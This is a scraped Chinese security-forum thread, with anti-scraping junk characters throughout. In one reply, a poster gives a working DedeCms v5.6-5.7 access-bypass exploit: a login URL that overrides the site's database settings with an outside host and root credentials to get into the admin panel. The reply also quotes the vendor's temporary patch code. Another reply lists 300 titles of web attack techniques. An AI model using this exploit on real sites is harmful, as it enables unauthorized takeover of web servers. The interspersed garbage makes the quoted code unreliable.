最近看过此主题的会员

返回列表 发帖

论坛内容及无效ID将进行一次清理

由于论坛近段时间疏于管理、再加上各种和谐压力,交流气氛也不如从前。所以有必要进行一次清理。望大家理解!

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

优蛋 /115网盘专用下载工具/ V2.1.11.126 简体绿色版

来过

最近一直在闭门修行。。所以一直没上,今天有时间发一个贴 证明存在

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

早该做了

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

/抠鼻  大叔不许把我的小马甲给清了。。。
讨厌啊,姐才不是圈内人呢~

TOP

织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
' x5 y3 t9 `. W/ j
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
4 y8 c/ {& Y5 r+ ^
此漏洞的前提是必须得到后台路径才能实现

! E" W0 Q4 C, [
官方临时解决办法:
' k' k8 T% Z/ w! ]' ]
找到include/common.inc.php文件,把:

- X7 s& h) N2 D' e6 V2 C
    foreach($_REQUEST as $_k=>$_v): c- r$ z4 m, _! [8 l/ K: n5 T
    {
- ]* @' ~' d# {& d. }( Y: L        var_dump($_k);5 i: O. \: \" j; ?9 S5 y
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
! A3 @& Y  b- x& n; o* T        {
# i- x& W1 n& v7 ^            exit('Request var not allow!');5 c- @6 Q$ c2 A4 [& w+ B5 _
        }
) \2 z5 V3 w! u    }
: q9 d" e8 J# n! Q
换成:

" j: j) X, ?! Q- N4 D' k' r) P
    //检查和注册外部提交的变量5 q4 M5 Q1 A4 S  S% O9 N* [
    function CheckRequest(&$val) {9 W: R0 z  P% s
        if (is_array($val)) {& w# z8 Z; z. Y' T, b1 Z5 R0 x
            foreach ($val as $_k=>$_v) {
" a- ]* _+ |+ P1 `                CheckRequest($_k);4 a" z; S- T) p# S: M
                CheckRequest($val[$_k]);
1 r5 ^+ e" s; D1 d            }) W# Y$ A1 V; a1 D9 {9 h
        } else! J: q+ _7 d% a  {+ V
        {
/ d$ [( ?8 ^* V6 T/ t1 N& a            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )  P# r; k% C  m1 R7 o. W" s! [
            {
6 l# E  Q: w" G                exit('Request var not allow!');
0 B& ?: v8 G1 E( N            }
1 C1 g: m+ L5 w- L        }  k. x. g; ~9 D1 s" `& Q4 `% _
    }4 ^% J) P" k! o0 q9 o( q: }
    CheckRequest($_REQUEST);4 y* r, k6 N9 |, Y& j/ Q0 P- H

7 `- B& @0 P+ w- k+ C6 ^$ l
" Q) w4 t% ^7 s" B: c3 p: N# P0 A8 ~4 h% s( {

1 ^2 r! W, J1 P/ k$ l; K' U0 w% b. J2 W) }, b
9 [% U# X+ G6 S  x% f/ V* E; t! _  g

( m& j+ p! w2 K/ Z1 T% {  m7 b
  c* f1 L+ U" J. F  H" i; k0 F2 M& `
& t& ^  o7 T7 C0 ^
8 W9 d: I8 h( E, |. `. W
6 ?& T: l: U& {
% D" H" J9 \! L8 Q

8 B8 Y- ], R; l6 H4 A0 `6 N! M& p* z7 p5 `

9 ~0 Z  P  z7 S" q/ Z. ?* @( x" B. }/ A/ ~6 V! I

: [1 r; h6 W6 F: }' w$ G
" g2 t; D$ V- F/ z公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

(2006-2009)300个攻击技术总结
(2006:1-65 | 2007:66-148 | 2008:149-218 | 2009:219-300) 300种思路,300个变通思维。部分文章需翻墙看。( M" Z7 p( o" B% R
1.The Attack of the TINY URLs' i) z2 B4 E& y1 A) X
2.Backdooring MP3 Files
7 ^( B: }4 N2 R" ~$ o3.Backdooring QuickTime Movies5 d4 z: N$ d/ o8 B; c' x
4.CSS history hacking with evil marketing2 Z" A7 E* @% ]  [: o! Z
5.I know where you've been. p2 D; x0 c7 D7 h, A
6.Stealing Search Engine Queries with JavaScript+ B8 _# ]5 e5 X
7.Hacking RSS Feeds- Z) c+ s1 p  r! K6 o7 Y+ y1 o
8.MX Injection : Capturing and Exploiting Hidden Mail Servers
) b( u/ G$ z7 i+ m" z5 a% c& o% ^9.Blind web server fingerprinting. P; i: l" @6 F) N
10.JavaScript Port Scanning3 K# m, A* y7 f( K  X1 I
11.CSRF with MS Word
+ f4 a* i4 O  z6 H12.Backdooring PDF Files
6 N4 H7 Q: n. Z13.Exponential XSS Attacks: S$ X  |; ^# s" L" H3 p
14.Malformed URL in Image Tag Fingerprints Internet Explorer
5 [2 I, K0 O4 z- Y8 u% j2 Q$ k15.JavaScript Portscanning and bypassing HTTP Auth
. o/ V1 @) l- q$ a+ r) A2 E16.Bruteforcing HTTP Auth in Firefox with JavaScript
8 K5 Y0 Q+ b: k17.Bypassing Mozilla Port Blocking
. v- a7 w8 F1 p8 h9 M18.How to defeat digg.com
. l$ E1 n6 U- {19.A story that diggs itself/ P% C! I+ R; V" |0 f% Q/ S
20.Expect Header Injection Via Flash
0 K) {( P5 q) d2 G$ ]21.Forging HTTP request headers with Flash
* }5 P' I+ e- D. g4 r) c22.Cross Domain Leakage With Image Size  [% h# t. [$ T- y9 b& A
23.Enumerating Through User Accounts
2 A- j5 ~5 [2 s/ q24.Widespread XSS for Google Search Appliance
! S5 E6 u- x* A2 g/ w' K25.Detecting States of Authentication With Protected Images
& M. J( Y( t9 ^7 m/ @: ?" J26.XSS Fragmentation Attacks5 j6 v' }2 U% m
27.Poking new holes with Flash Crossdomain Policy Files
8 q  p6 q" Y- i+ s2 Z, b3 J28.Google Indexes XSS+ p" Q0 b9 v8 u1 j" z  g
29.XML Intranet Port Scanning" J" u. M% Q; p/ k8 L: M
30.IMAP Vulnerable to XSS
7 K4 w. s! ^( k, k+ n5 D31.Detecting Privoxy Users and Circumventing It
7 e' @6 v2 b, v, d. c5 V32.Using CSS to De-Anonymize
: H5 _/ {7 H4 c. k0 Z33.Response Splitting Filter Evasion* r5 l: S/ [% ~8 d' Q1 j
34.CSS History Stealing Acts As Cookie
( n* ~4 p" w& u$ Q: |35.Detecting FireFox Extentions
6 O' ]8 [5 v( B( [36.Stealing User Information Via Automatic Form Filling- r7 l6 g' _/ M6 {6 i6 c# D) i# {* Y
37.Circumventing DNS Pinning for XSS
$ ]. ~8 N( I" J4 j7 A7 f4 {- k38.Netflix.com XSRF vuln5 I/ s# X4 C/ L/ i* h5 @. v3 i0 j6 ^
39.Browser Port Scanning without JavaScript
! Y6 @! a3 @9 x1 }1 X0 U40.Widespread XSS for Google Search Appliance3 ]7 p5 b2 X, ?
41.Bypassing Filters With Encoding
8 I) m  X$ P$ B5 H( R. g* s42.Variable Width Encoding1 u+ V) ^$ l+ @, _6 T
43.Network Scanning with HTTP without JavaScript( R7 u6 t( N, b6 Q$ {
44.AT&T Hack Highlights Web Site Vulnerabilities " i4 E0 z( S1 V" w/ i
45.How to get linked from Slashdot; D6 \0 \; V6 U1 I; L8 [- H
46.F5 and Acunetix XSS disclosure8 Y0 p7 n0 q! P: g- Q4 G
47.Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning# F5 s3 t4 M" o
48.Google plugs phishing hole
  w8 F% k- e$ t' o8 Z' I49.Nikon magazine hit with security breach
; U$ \0 d' C' N1 S( W50.Governator Hack
; |# S4 k: s' |. m0 [51.Metaverse breached: Second Life customer database hacked
& B9 E& k* o; T52.HostGator: cPanel Security Hole Exploited in Mass Hack
3 `3 z; E" w! l+ P, }( a; |! X* D; {53.Firefox Extensions8 }5 [& S- y3 w8 i
54.ABC News (AU) XSS linking the reporter to Al Qaeda
8 D5 u, h1 G/ e55.Account Hijackings Force LiveJournal Changes" J6 ?( m& v/ f. t% |  N" c
56.Xanga Hit By Script Worm' w+ l: U2 N& y/ |5 X* j5 R
57.Advanced Web Attack Techniques using GMail
# i) g- ^* g4 D4 ~6 p" r: R58.PayPal Security Flaw allows Identity Theft- `& f9 [0 e( a" r" P; F) I
59.Internet Explorer 7 "mhtml:" Redirection Information Disclosure3 _) a$ n4 Y- @
60.Bypassing of web filters by using ASCII
5 ?3 P2 W* S5 P( R& X; H# |61.Selecting Encoding Methods For XSS Filter Evasion( \( @* b( l% [" B+ W
62.Adultspace XSS Worm
% j& l6 Z/ Z1 J0 P" \! k63.Anonymizing RFI Attacks Through Google
) h  O9 s; `4 n! s( q. d; w- g* h64.Google Hacks On Your Behalf
# P+ M/ J) k( u; g65.Google Dorks Strike Again
5 U3 M* n% K' L7 C: [, b66.Cross-Site Printing
' g. c" }3 j5 ^0 j5 a67.Stealing Pictures with Picasa
. {5 K' Y7 I1 f' L/ A68.HScan Redux
% _1 h8 C  R4 i3 V69.ISO-8895-1 Vulnerable in Firefox to Null Injection
, s# z9 M) n2 p( {% B( f70.MITM attack to overwrite addons in Firefox) C4 S2 c) Y: q9 L
71.Microsoft ASP.NET Request Validation Bypass Vulnerability $ I) P& b2 s$ ?" F8 Z6 ^4 y
72.Non-Alpha-Non-Digit 3
& w% w9 C( ?/ A9 L4 F" K# }73.Steal History without JavaScript2 p* N, p; q/ ]) L
74.Pure Java??, Pure Evil?? Popups9 A" m- b% ~; _1 v2 P  C
75.Google Adsense CSRF hole
# q5 I" D# U1 Q76.There’s an OAK TREE in my blog!?!?!
4 f/ n5 |( U6 v2 r77.BK for Mayor of Oak Tree View
0 h# H8 r0 p$ T7 B* A' n% \78.Google Docs puts Google Users at Risk) L$ |4 n& O; g' M" O/ r+ g5 t
79.All Your Google Docs are Belong To US…. |  J* a3 _& @1 L3 z  ^" H
80.Java Applets and DNS Rebinding
& E2 v" L: M& F7 R  q3 f( e81.Scanning internal Lan with PHP remote file opening./ @1 T& [0 q5 O: p4 x
82.Firefox File Handling Woes: u! F: a6 a, w) g) p
83.Firefoxurl URI Handler Flaw8 S6 ^0 o  E' K, x: m
84.Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability
$ K) `0 W" P1 W5 J$ a8 \# {  k85.Multiviews Apache, Accept Requests and free listing
1 w2 D# H) A, z1 D6 c* K3 G86.Optimizing the number of requests in blind SQL injection
9 |0 x& |) o, [, g; V: I9 p" C! \1 z87.Bursting Performances in Blind SQL Injection - Take 2
4 H9 C- ~3 w4 G1 D0 C88.Port Scan without JavaScript3 X; b& i, O) \1 I- M* d
89.Favorites Gone Wild. _& q* e. Q5 F3 {$ p: V0 O
90.Cross-Browser Proxy Unmasking+ B4 g% e+ U# |5 I& E, p
91.Spoofing Firefox protected objects2 R: }1 V* n& e+ z. L
92.Injecting the script tag into XML
6 E4 f5 J& F% D5 V! _+ G* z93.Login Detection without JavaScript% A1 B) S; h: \7 n' _! v
94.Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
& b4 m& w9 `# l# I: n0 v95.Username Enumeration Timing Attacks
; _8 O2 C- S1 \. D96.Google GMail E-mail Hijack Technique4 I0 r8 U) S# l7 t/ v, T
97.Recursive Request DoS
! w8 P8 Q* B$ Z1 M' C9 u- y* R98.Exaggerating Timing Attack Results Via GET Flooding
2 E+ o' t: F  w7 O  p6 L99.Initiating Probes Against Servers Via Other Servers
; i4 r3 O8 m: e. U100.Effects of DNS Rebinding On IE’s Trust Zones5 W6 T. b, {4 r7 v
101.Paper on Hacking Intranets Using Websites
! n% O# f2 G3 b4 ~102.More Port Scanning - This Time in Flash& |/ O+ |$ n. s% A3 c8 n6 b# Z
103.HTTP Response Splitting and Data: URI scheme in Firefox
  k5 D1 }3 p! v) U9 z5 t104.Res:// Protocol Local File Enumeration0 Y+ i( u, O( p2 [
105.Res Timing Attack  S1 I1 L) e4 L, j; l
106.IE6.0 Protocol Guessing
7 d& J! j/ W# n9 T' Z3 b107.IE 7 and Firefox Browsers Digest Authentication Request Splitting
& U9 O9 v+ [( e, Q108.Hacking Intranets Via Brute Force
" P' ^7 p+ p0 V5 N) G109.Hiding JS in Valid Images
. O* M! R& ?  B) K9 ~% l110.Internet Archiver Port Scanner
3 x" i+ a6 {9 }3 v* }, d111.Noisy Decloaking Methods
! W/ F8 `  h7 H! d9 [112.Code Execution Through Filenames in Uploads0 [: |8 t4 A& O$ s3 N( L
113.Cross Domain Basic Auth Phishing Tactics2 \6 ]: w: D3 i1 h
114.Additional Image Bypass on Windows; ~1 f$ g( [! Z) I- H- W
115.Detecting users via Authenticated Redirects
5 o4 p9 h5 [7 D9 F' d3 P$ i116.Passing Malicious PHP Through getimagesize()- x- m; n9 t1 K3 a- ]6 W
117.Turn Any Page Into A Greasemonkey Popup
  m+ D3 y6 _: D: v' h3 b" J% X! C118.Enumerate Windows Users In JS- d  n3 u8 a4 ?- N9 u0 R: o
119.Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH- j' e# ~/ H" {- b7 W, _: s7 p; y
120.Iframe HTTP Ping0 d+ L6 }' b: ^( m
121.Read Firefox Settings (PoC)
* i8 C4 c% f0 W' P! y2 L& J$ R" d122.Stealing Mouse Clicks for Banner Fraud  K" e5 c+ l) r4 J3 i
123.(Non-Persistent) Untraceable XSS Attacks
' L  N. Q; o  K/ _0 f124.Inter Protocol Exploitation
/ Z# k. S! ~% q* w( E125.Detecting Default Browser in IE. _8 m" q9 V. X- D+ f7 i
126.Bypass port blocking in Firefox, Opera and Konqueror.. i, T7 f- Z! S" |- N/ v& T
127.LocalRodeo Detection
2 d- n. e% R9 Z* G128.Image Names Gone Bad
1 Q; U* v4 C: G9 t% h" q129.IE Sends Local Addresses in Referer Header1 W7 o  C4 F) m0 S2 t% v7 r' m
130.PDF XSS Can Compromise Your Machine
; h8 ~- K$ B, T( |5 u131.Universal XSS in Adobe’s Acrobat Reader Plugin4 Z# a) q' y7 ?- _4 D- Y
132.Firefox Popup Blocker Allows Reading Arbitrary Local Files
2 T9 M( y" |" I; o+ G  t$ H133.IE7.0 Detector
2 @+ q6 }2 g; p134.overwriting cookies on other people’s domains in Firefox.2 p  U; f% B( F9 f; J  v3 T4 r
135.Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
/ K. L: u; b/ |7 ?& ^1 l* {1 k" Z136.Firefox Header Redirection JavaScript Execution) F7 A) _, c$ E9 l
137.More URI Stuff… / P, z0 q/ F, t; e% |; h* V7 ?
138.Hacking without 0days: Drive-by Java' H+ w& ]  c& c+ @% Q
139.Google Urchin password theft madness
: k2 C$ l* C1 A" }1 ~: h$ _6 b3 d140.Username Enumeration Vulnerabilities% F: Y! w5 E6 r  u
141.Client-side SQL Injection Attacks4 a! y2 F) ?( L! M
142.Content-Disposition Hacking0 M; }, [$ I! D1 q
143.Flash Cookie Object Tracking
( Q8 c, r9 q! z$ ?8 F, \, [144.Java JAR Attacks and Features
6 G! h! q: n- m4 v" l  N0 _" A145.Severe XSS in Google and Others due to the JAR protocol issues
: h& g, l! W) N, V. b146.Web Mayhem: Firefox’s JAR: Protocol issues
0 n5 }0 Q0 t. \  v/ w147.0DAY: QuickTime pwns Firefox
! k( i. U1 j5 H5 p- |% ^* v148.Exploiting Second Life
/ B/ j- A" y, ^1 g149.CUPS Detection
+ R, f% s% @5 F/ D150.CSRFing the uTorrent plugin0 z: P3 \& x$ \# l# J
151.Clickjacking / Videojacking. A, [6 i. ?# \
152.Bypassing URL Authentication and Authorization with HTTP Verb Tampering, V: \$ }$ x* R1 `
153.I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)/ a. d& }% q4 b- I  {% `  }, B- o
154.Safari Carpet Bomb
0 L+ a' N6 `( g* N, g; x6 u155.Flash clipboard Hijack6 _% D1 [+ e/ ~) U
156.Flash Internet Explorer security model bug
1 w2 e5 N5 D8 I9 O8 n  _7 ?8 e157.Frame Injection Fun
0 M" c7 w0 T3 h1 p158.Free MacWorld Platinum Pass? Yes in 2008!" i$ Q' ~+ u: g- e2 y) _
159.Diminutive Worm, 161 byte Web Worm
# A! w; x. ?: f$ y% P3 @$ a160.SNMP XSS Attack (1)% ^) y" z: ^' w7 \2 a& i
161.Res Timing File Enumeration Without JavaScript in IE7.06 e- V6 W' D4 a: c
162.Stealing Basic Auth with Persistent XSS* B$ \& Q* G. H
163.Smuggling SMTP through open HTTP proxies
9 Y4 ?- X% K7 n9 y! `3 R164.Collecting Lots of Free 'Micro-Deposits'  P6 f9 @& M' j& j
165.Using your browser URL history to estimate gender, i+ o7 N6 ?; F4 t5 y( U
166.Cross-site File Upload Attacks
" V$ ]# u% R1 c; K167.Same Origin Bypassing Using Image Dimensions
! i: w$ J9 P& v* |; \2 S. J; ~. g168.HTTP Proxies Bypass Firewalls: K. U( j' D: J2 D
169.Join a Religion Via CSRF, n% W, U8 s! h; X8 t
170.Cross-domain leaks of site logins via Authenticated CSS( z& N  @* m& h9 P
171.JavaScript Global Namespace Pollution' L. t, ~' S( w6 @5 w2 @/ }4 i
172.GIFAR
7 e# w# k; {$ D/ ?2 ?6 I7 Z9 V173.HTML/CSS Injections - Primitive Malicious Code% w% m5 N) L  E
174.Hacking Intranets Through Web Interfaces1 q3 \2 X# s! X/ t1 R( k$ A6 |
175.Cookie Path Traversal
. ]9 Z0 y5 z/ \2 |* J2 x/ k- Y176.Racing to downgrade users to cookie-less authentication, {+ }4 {$ O- w. ^
177.MySQL and SQL Column Truncation Vulnerabilities
& \+ l5 e) u8 k2 `: o9 }: O5 A  e178.Building Subversive File Sharing With Client Side Applications
; y. i  W0 R3 J8 R179.Firefox XML injection into parse of remote XML! u9 `  R, Y6 ?+ B, Z
180.Firefox cross-domain information theft # ]8 d# o# w: [' J+ B
181.Firefox 2 and WebKit nightly cross-domain image theft
; O1 T/ z* ]- C  k! W182.Browser's Ghost Busters
$ Y2 ~2 h& c9 l8 [183.Exploiting XSS vulnerabilities on cookies
1 W) N7 P. ?+ l184.Breaking Google Gears' Cross-Origin Communication Model
, L! `% o5 G9 K' B- G* C3 [, c185.Flash Parameter Injection
8 j& {  i- _4 A- A186.Cross Environment Hopping' q  T) N' k& H4 J' g
187.Exploiting Logged Out XSS Vulnerabilities6 f$ m6 T- [% \' \/ _
188.Exploiting CSRF Protected XSS) C( ?6 X  x* m; n/ [  `! D9 v
189.ActiveX Repurposing, (1, 2)9 Q( I9 D* [. [
190.Tunneling tcp over http over sql-injection
% z9 u7 a9 r: U9 B1 ]: a8 L191.Arbitrary TCP over uploaded pages
8 Q, ^- O0 Z- N, k192.Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
+ ^5 }! F; a8 K& n8 `0 D( G: n9 I193.JavaScript Code Flow Manipulation
/ {& V' I' Z( ^( Z, f: N" ^& r194.Common localhost dns misconfiguration can lead to "same site" scripting
  o) b  r- p2 x+ u( T* G195.Pulling system32 out over blind SQL Injection# r  U0 i# [' U' x
196.Dialog Spoofing - Firefox Basic Authentication- H5 c, o- \9 \$ a( B
197.Skype cross-zone scripting vulnerability
+ F; r( `5 K- G; l$ l" ^; v198.Safari pwns Internet Explorer
' e. P; Y" a" u( F3 a0 P4 C' D3 s199.IE "Print Table of Links" Cross-Zone Scripting Vulnerability
; a- h" N) L4 b7 c0 L200.A different Opera
: U1 C4 q, T3 |% V201.Abusing HTML 5 Structured Client-side Storage
; ?) j. s% k$ O  l  q  Q202.SSID Script Injection& l0 [7 _* X1 ]
203.DHCP Script Injection% ^7 m4 q/ z2 K/ \( ~2 I% }: F0 K
204.File Download Injection
$ J0 w" f/ O9 N+ j# b205.Navigation Hijacking (Frame/Tab Injection Attacks)
- I" @9 w2 L4 k/ M0 d206.UPnP Hacking via Flash
4 k" [8 p7 u# p* M5 _9 h, R( \5 g5 l207.Total surveillance made easy with VoIP phone
6 ^0 Y4 f% i, a4 W; I208.Social Networks Evil Twin Attacks
% o+ g! Z, v5 g5 }* z4 {/ O/ n209.Recursive File Include DoS
2 q8 O/ b, ~) n( `3 W6 F210.Multi-pass filters bypass! }" I' K5 u7 j0 Z% t
211.Session Extending' Y5 s; t! f" h; ?0 O9 z! C% s; [
212.Code Execution via XSS (1) ! j8 q/ s+ b# Z# T5 W4 k) a3 y
213.Redirector’s hell- \2 y4 G& U$ R6 {. w1 b
214.Persistent SQL Injection
) J. ?: k! L2 ~* f, W$ E% W/ u215.JSON Hijacking with UTF-7" b3 M- F+ h/ ?2 a! Z# J
216.SQL Smuggling. j7 O. l' T' h
217.Abusing PHP Sockets (1, 2)
/ M/ S( x/ D+ g218.CSRF on Novell GroupWise WebAccess& y/ E9 O- u7 l! O
219.Persistent Cookies and DNS Rebinding Redux. E+ s/ F: k. @" U; J# {( e  j
220.iPhone SSL Warning and Safari Phishing
3 `  H" n  l7 q5 d# y; p" j# j221.RFC 1918 Blues2 q" u1 y3 s) R% F
222.Slowloris HTTP DoS# h; q( m2 m) o" e' l" f0 f" N
223.CSRF And Ignoring Basic/Digest Auth
; _+ s+ c( v1 }224.Hash Information Disclosure Via Collisions - The Hard Way
! r+ F' X2 x( K225.Socket Capable Browser Plugins Result In Transparent Proxy Abuse" |% {5 x$ \  ^, J/ i- t! Z
226.XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+7 }: o3 W- [: U1 _0 l% Z
227.Session Fixation Via DNS Rebinding. u' g: l% R. u3 \$ ?! [1 |
228.Quicky Firefox DoS$ s7 [" a8 d7 E
229.DNS Rebinding for Credential Brute Force; L& e- p2 y( q1 C' P' e
230.SMBEnum
& }9 l5 u, _2 A4 f" R231.DNS Rebinding for Scraping and Spamming
, _! @& H1 ?% F( u3 o232.SMB Decloaking$ N/ _2 e; J4 v' r( ?
233.De-cloaking in IE7.0 Via Windows Variables
6 |5 I- j2 o6 J' e& `+ U234.itms Decloaking% {$ K2 i( E" @7 N/ n8 b' u$ m
235.Flash Origin Policy Issues5 ]* T+ P* d$ D2 e" M  Q+ T& h$ R
236.Cross-subdomain Cookie Attacks$ y$ G" x, G- j# _+ C3 S
237.HTTP Parameter Pollution (HPP)
) m  y* }( k& o9 k9 [( h4 r238.How to use Google Analytics to DoS a client from some website.
' B* T5 N7 f7 Y! ]' O8 F1 R239.Our Favorite XSS Filters and how to Attack them
- q- c2 X, ^& ~2 p! N. K( j' e240.Location based XSS attacks
5 T% a4 J* ^9 u9 J/ M241.PHPIDS bypass
  b4 W% f! J" ]/ Q( v& r9 E242.I know what your friends did last summer
8 q$ D+ T  e- G9 h/ Z243.Detecting IE in 12 bytes% d. V1 n: F: l/ w3 O5 U3 v7 Q' E% @
244.Detecting browsers javascript hacks
. ?! R' D. w3 O' `" q245.Inline UTF-7 E4X javascript hijacking7 E  l- w1 U& V4 U( t1 V
246.HTML5 XSS
: H8 t- D3 v% k0 k4 ^247.Opera XSS vectors
( V& P6 Y9 O6 p* e4 G9 j248.New PHPIDS vector
5 N$ q$ u( x/ B6 N6 ~249.Bypassing CSP for fun, no profit' W4 w, o. [, _: a
250.Twitter misidentifying context
# q% L9 H2 ]' N/ J251.Ping pong obfuscation' \* ]0 t3 ?+ U0 N3 `, r
252.HTML5 new XSS vectors
' N7 l9 d; x0 o' r253.About CSS Attacks
* V- f6 {. W: W7 m- z5 i254.Web pages Detecting Virtualized Browsers and other tricks
& ~) U3 D7 k/ `' t& {( y255.Results, Unicode Left/Right Pointing Double Angel Quotation Mark
; u- r( _. L% ]# n256.Detecting Private Browsing Mode   |: z& ~3 a# h$ `% x! U: P
257.Cross-domain search timing  m9 }  e! w6 ]; o* K" |8 g
258.Bonus Safari XXE (only affecting Safari 4 Beta)( m8 L/ C) V( K7 {
259.Apple's Safari 4 also fixes cross-domain XML theft( H3 b6 z$ l# T6 H+ Q+ g/ y
260.Apple's Safari 4 fixes local file theft attack
9 t2 U7 }0 x7 g$ U! t2 p261.A more plausible E4X attack
* u4 n2 l6 r8 R262.A brief description of how to become a CA
  t  O: R% c. b) P- i263.Creating a rogue CA certificate
& y/ @" V8 H1 ^" K) V: u& L, B4 J, U264.Browser scheme/slash quirks
+ C" G) v0 e$ M. B8 V$ `2 w265.Cross-protocol XSS with non-standard service ports9 G5 {& A6 b7 j
266.Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”5 G  X1 e" m3 S' ^
267.MD5 extension attack
5 r* o, f) Q% {+ m/ z7 j) R268.Attack - PDF Silent HTTP Form Repurposing Attacks' F$ o& D% r" H
269.XSS Relocation Attacks through Word Hyperlinking
+ _6 _. I4 I. A( ~270.Hacking CSRF Tokens using CSS History Hack
* u( p/ p; |( y, {& F) Z271.Hijacking Opera’s Native Page using malicious RSS payloads
$ D* v2 ^+ K6 \/ c272.Millions of PDF invisibly embedded with your internal disk paths. K, [, }6 i: b4 u% y
273.Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection; O% }  n/ S# ?! [$ D4 E8 w
274.Pwning Opera Unite with Inferno’s Eleven
! q1 ~7 |# g4 e. n2 B275.Using Blended Browser Threats involving Chrome to steal files on your computer
, ^$ i4 I+ H  }# o# M" s( X' u276.Bypassing OWASP ESAPI XSS Protection inside Javascript
# D/ N1 X: S+ c2 }% Z0 x8 M277.Hijacking Safari 4 Top Sites with Phish Bombs
6 G, |2 i9 q) r9 f; |+ u& a8 z278.Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency1 H  c3 H% w6 B& @% l
279.Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF/ z$ {8 Z9 w/ M/ R2 f
280.IE8 Link Spoofing - Broken Status Bar Integrity8 o- _4 q4 L# F5 y3 a8 x" Z
281.Blind SQL Injection: Inference thourgh Underflow exception
$ Y5 C. e& w9 a! B! J* |282.Exploiting Unexploitable XSS/ u: `+ [" a" I- w& {
283.Clickjacking & OAuth3 ~( |3 ]' y& p8 ~( J1 F) I) S8 Y
284.Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk6 ]9 e. @7 T8 U7 u
285.Active Man in the Middle Attacks- {, H' }5 h) J" ]: X: M
286.Cross-Site Identification (XSid)' k4 Q9 T$ L: x) l# u2 z( l# ]
287.Microsoft IIS with Metasploit evil.asp;.jpg
* J8 A' w  S& Z288.MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency
$ W1 d1 ~; }* i8 h1 ?289.Generic cross-browser cross-domain theft
8 K7 d$ v# H' w5 Q# A* `( q* w290.Popup & Focus URL Hijacking
( Q& }# v9 ]3 f, n291.Advanced SQL injection to operating system full control (whitepaper)
3 z3 [) \# t) A/ f5 |% _% t, ~; g292.Expanding the control over the operating system from the database
+ `' _2 L8 J; [& c$ K7 g293.HTML+TIME XSS attacks
8 E$ E) O% y) A7 A; f! Z+ Y294.Enumerating logins via Abuse of Functionality vulnerabilities. U" _' v5 H9 Z' j
295.Hellfire for redirectors
# k4 [: ]+ |% F5 O296.DoS attacks via Abuse of Functionality vulnerabilities
& _% U; L, H/ a3 b# Z& [9 l297.URL Spoofing vulnerability in bots of search engines (#2) 7 `- O0 b( n% L" ]% V
298.URL Hiding - new method of URL Spoofing attacks& u- T9 H* g: s
299.Exploiting Facebook Application XSS Holes to Make API Requests* s( L( e$ Q6 J- R7 U$ R8 A
300.Unauthorized  TinyURL URL Enumeration Vulnerability$ C; E) b# `5 J  w* m
! m, ^: b  K5 H0 e1 a

1 B* j1 N9 M* G5 j
: [9 H8 @' B1 }) S5 X2 H$ H7 |' ^. O

1 J( u2 W1 P! @  Z5 N/ y% b/ a6 x
0 h& f* x1 B( T( D  F1 y! L) }
- f  J) ^" e" p# V" y

# |& v, [! p% J2 C/ `% }: a0 x8 b
% F0 p8 d- t( m4 T3 _! i& M
$ |9 p6 _0 c, P4 n4 o. Y" `
2 R" U' V4 R0 ]6 Y% d+ g" S: p( q. W9 C
1 p; Z  |, W$ ?

- X9 V9 m) F) o0 V) ?5 k) ]* q& @+ W$ c8 F, U0 n( G4 x

$ |$ I3 M: ~' q, i
* Q1 ]" |0 A1 d' ], g公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表